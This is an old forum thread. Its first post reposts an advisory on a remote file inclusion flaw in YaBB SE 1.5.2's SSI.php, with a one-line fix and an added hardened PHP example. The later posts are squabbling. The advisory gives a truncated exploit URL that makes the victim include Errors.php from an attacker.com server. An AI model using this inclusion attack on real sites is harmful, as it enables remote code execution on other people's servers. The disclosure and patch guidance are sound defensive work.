Old 05-18-2003, 07:16 PM   #1
 
Join Date: May 2003
Posts: 56
Remote code execution in YaBBse 1.5.2 (php version)

======[ Overview
YaBB is a widely used bulletin board system.




======[ Problem
One of the files that is included in the main application is vulnerable
to remote code execution if it is accessed directly with certain
parameters.
The name of the file is SSI.php.
A similar bug was discovered in the previous version, YaBB 1.5.1.


SSI.php:
------------------------------------------
include_once ($sourcedir . '/Errors.php');
include_once ($sourcedir . '/Subs.php');
include_once ($sourcedir . '/Load.php');
------------------------------------------


We can define the $sourcedir variable through the URL and include some other PHP script, local or remote if remote inclusion is enabled in the php.ini file ...
The bug is not exploitable if PHP's register_globals is set to off ...


======[ Exploit


Exploit would look like this:

http://www.victim.com/yabbse/ssi.php...w.attacker.com



Attacker would place an Errors.php file on his server ... The code included would get executed on victim's server ...
Attacker's httpd server should not have php enabled because the
script will be parsed before sending it to the victim ...


======[ Solution


Add this line before the include_once() lines mentioned above.



if (!isset($sourcedir)) $sourcedir = "";


======[ Greetz ]======
Greetz goes to hr.hackers and linux .
Special greetz goes to (rand()): BoyScout, h4z4rd, rtny, finis, Sunnis, Fr1c, phreax, StYx, harlequin, LekaMan, Astral and active-security.

** Credit to eLtorO **


Sincerely
CourtneyDS
__________________

CourtneyDS is offline   Reply With Quote
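
One way to harden the three includes from the advisory above so that the base path can never come from the request; this is an added example, not YaBB SE code and not part of the original post. The Sources/ directory location and the resolve_source() helper are assumptions made for illustration.

```php
<?php
// Added example, not YaBB SE code. Assumes (hypothetically) that the three
// include files live in a Sources/ directory beside this script.

// 1. Refuse any request that tries to supply the include base itself.
//    With register_globals on, such a value would already be sitting in
//    $sourcedir when the script starts.
foreach (array($_GET, $_POST, $_COOKIE) as $input) {
    if (array_key_exists('sourcedir', $input)) {
        header('HTTP/1.1 400 Bad Request');
        exit('Bad request');
    }
}

// 2. Assign the base path unconditionally from a server-side location.
//    An isset() test is not enough here: a request-supplied value counts
//    as "set", so only an unconditional assignment overwrites it.
$sourcedir = dirname(__FILE__) . '/Sources';

// 3. Resolve each file and confirm it is one of the expected names and
//    really sits under the base directory before including it.
function resolve_source($base, $name)
{
    $allowed = array('Errors.php', 'Subs.php', 'Load.php');
    if (!in_array($name, $allowed, true)) {
        return false;
    }
    $root = realpath($base);
    $path = realpath($base . '/' . $name); // false for missing files and URLs
    if ($root === false || $path === false) {
        return false;
    }
    if (strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $path;
}

foreach (array('Errors.php', 'Subs.php', 'Load.php') as $file) {
    $path = resolve_source($sourcedir, $file);
    if ($path === false) {
        header('HTTP/1.1 500 Internal Server Error');
        exit('Configuration error');
    }
    include_once $path;
}
```

Setting register_globals to off in php.ini, which the post names as the condition that makes the bug unexploitable, removes the injection path for every script on the server, not only this one.
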
Old 05-19-2003, 09:31 AM   #2
Fully Optimized
 
Slayer's Avatar
 
Join Date: Mar 2003
Posts: 3,111
Default

Just out of interest, who the heck is 'eltoro'?
__________________

Slayer is offline   Reply With Quote
Old 05-19-2003, 11:12 AM   #3
Site Team
 
David Lindon's Avatar
 
Join Date: Dec 2002
Posts: 15,233
Default

Thanks for the warning court.
__________________
LNXPS.NET - The XPS Library (http://www.LNXPS.NET)
David Lindon is offline   Reply With Quote
Old 05-19-2003, 07:47 PM   #4
 
Join Date: May 2003
Posts: 56
Default

rocker_nash
Quote:
Just out of interest, who the heck is 'eltoro'?
^^ Personally if I were you.. (15 year old high school kid).. pick up a book and learn and don't concern yourself with who is who.. ok little boy ...:

--------------------------------------------------
David :
Quote:
Thanks for the warning court.

^^ You're more than welcome David ... PHP is a very weak code as some rate it as the ultimate ... <<>> How can it be rated "Tops" when their entire database can be wiped-out in under 12 key strokes ?

Sincerely
CourtneyDS
CourtneyDS is offline   Reply With Quote
Old 06-02-2003, 07:59 PM   #5
Baseband Member
 
Join Date: May 2003
Posts: 35
Default

damn, even i can do it up on yabb and mysql
webcamguy is offline   Reply With Quote
Old 06-02-2003, 08:18 PM   #6
In Runtime
 
eyelfixit's Avatar
 
Join Date: Mar 2003
Posts: 120
Default

Doubt it, there are patches out there and this is extremely old info.
__________________
BC Save website: http://www.bcsave.com

BC Save Forum: http://www.bcsave.com/forum

Co-author of:
http://powerbook.bcsave.com
eyelfixit is offline   Reply With Quote
Old 06-02-2003, 08:31 PM   #7
Baseband Member
 
Join Date: May 2003
Posts: 35
Default

whats she gonna do, tell ya how to do new stuff. damb eyelfixit, ur dumber then you look dude! shut up cuz peeps know you dont know sheout n jus copy n paste to make urself look smart.
webcamguy is offline   Reply With Quote
Old 06-02-2003, 08:35 PM   #8
In Runtime
 
eyelfixit's Avatar
 
Join Date: Mar 2003
Posts: 120
Default

The day you understand that you can't bully me and you're quite beneath me is the day you'll wake up.

All of this is wack including your responses, she gives out old redundant information and you praise her. I think you're the one that needs to learn something.
__________________
BC Save website: http://www.bcsave.com

BC Save Forum: http://www.bcsave.com/forum

Co-author of:
http://powerbook.bcsave.com
eyelfixit is offline   Reply With Quote
Old 06-02-2003, 08:39 PM   #9
Baseband Member
 
Join Date: May 2003
Posts: 35
Default

Quote:
Originally posted by eyelfixit
The day you understand that you can't bully me and you're quite beneath me is the day you'll wake up.

All of this is wack including your responses, she gives out old redundant information and you praise her. I think you're the one that needs to learn something.
how ya bully n ignorant arse like you, ya laugh at em like peeps at you whenever you post sheoit like you know what ur takin about. n the chick aint gonna post new exploits, ah ha ha ha ha damb ur dumb eyelfixit
webcamguy is offline   Reply With Quote
Old 06-02-2003, 08:42 PM   #10
In Runtime
 
eyelfixit's Avatar
 
Join Date: Mar 2003
Posts: 120
Default

Can you speak English cause I really can't follow your "slang" .

What you're saying doesn't make any sense, again!
__________________
BC Save website: http://www.bcsave.com

BC Save Forum: http://www.bcsave.com/forum

Co-author of:
http://powerbook.bcsave.com
eyelfixit is offline   Reply With Quote
All times are GMT -5.